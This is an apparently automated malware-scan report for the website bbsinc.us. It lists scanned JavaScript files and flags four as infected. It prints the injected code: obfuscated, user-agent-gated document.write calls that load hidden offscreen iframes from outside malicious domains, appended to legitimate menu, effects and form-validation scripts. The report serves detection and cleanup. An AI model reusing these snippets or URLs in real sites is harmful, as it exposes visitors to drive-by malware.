New scan:

Malware Scanner report for bbsinc.us

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/7
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.bbsinc.us/
200 OK
Content-Length: 23060
Content-Type: text/html
clean
http://www.bbsinc.us/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js
200 OK
Content-Length: 580
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/media/system/js/caption.js
200 OK
Content-Length: 0
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/modules/mod_yoo_scroller/mod_yoo_scroller.js
200 OK
Content-Length: 578
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: plarosigahyet.savannahcrimes.com

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas();

Decoded script:


<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe>

Malicious iFrame found.
size: 138x138     
src: http://plarosigahyet.savannahcrimes.com/lauritosman15.html
This URL is marked by Google as suspicious

<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138">

http://www.bbsinc.us/modules/mod_yoo_search/mod_yoo_search.js
200 OK
Content-Length: 0
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1
200 OK
Content-Length: 2165
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://duislow.voiceofpalmsprings.com/nuniojetos15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
... 1004 bytes are skipped ...
.options);B.setStyles({display:"block","background-image":E,opacity:0});B.injectInside(D);D.addEvent("mouseenter",function(F){A.start({opacity:1})}.bind(this));D.addEvent("mouseleave",function(F){A.start({opacity:0})}.bind(this))}});YOOSpotlight.implement(new Options);window.addEvent("load",function(){new YOOSpotlight("div.spotlight, span.spotlight")});document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" wi

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]
Sophos
Troj/JSRedir-OI

http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js
200 OK
Content-Length: 583
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js
200 OK
Content-Length: 1433
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var YOOAccordionMenu = new Class({

initialize: function(togglers, elements, options) {
this.setOptions({
accordion: 'default'
}, options);
this.togs = togglers;
this.elms = elements;

switch(this.options.accordion) {
case 'slide':
this.createSlide();
break;

default:
this.createDefault();
}
},

createDefault: function() {
var options = {};

... 596 bytes are skipped ...
nsitions.linear, duration: 250 });

if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) {
fx.hide();
}

span.addEvent('click', function(){
fx.toggle();
});
}.bind(this));
}

});

YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499"

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]
Sophos
Mal/Iframe-AN

http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js
200 OK
Content-Length: 0
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js
200 OK
Content-Length: 570
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js
200 OK
Content-Length: 0
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/wthvideo/wthvideo.js
200 OK
Content-Length: 570
Content-Type: application/x-javascript
clean
http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&Itemid=125
200 OK
Content-Length: 16144
Content-Type: text/html
clean
http://www.bbsinc.us/media/system/js/validate.js
200 OK
Content-Length: 4397
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JFormValidator = new Class({
initialize: function()
{
this.handlers = Object();
this.custom = Object();
this.setHandler('username',
function (value) {
regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i");
return !regex.test(value);
}
);
this.setHandler('password',
function (value) {
regex=/^\S[\S ]{2,98}\S$/;
return regex.test(value);
}
);
this.setHandler('numeric
... 2554 bytes are skipped ...
abelref) {
$(el.labelref).addClass('invalid');
}
} else {
el.removeClass('invalid');
if (el.labelref) {
$(el.labelref).removeClass('invalid');
}
}
}
});
document.formvalidator = null;
Window.onDomReady(function(){
document.formvalidator = new JFormValidator();
});document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499"

Antivirus reports:

Avast
JS:Iframe-DGJ [Trj]

http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&Itemid=124
200 OK
Content-Length: 17391
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bbsinc.us

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bbsinc.us
Referer: http://www.google.com/search?q=bbsinc.us

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bbsinc.us

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bbsinc.us/

Result: bbsinc.us is not infected or malware details are not published yet.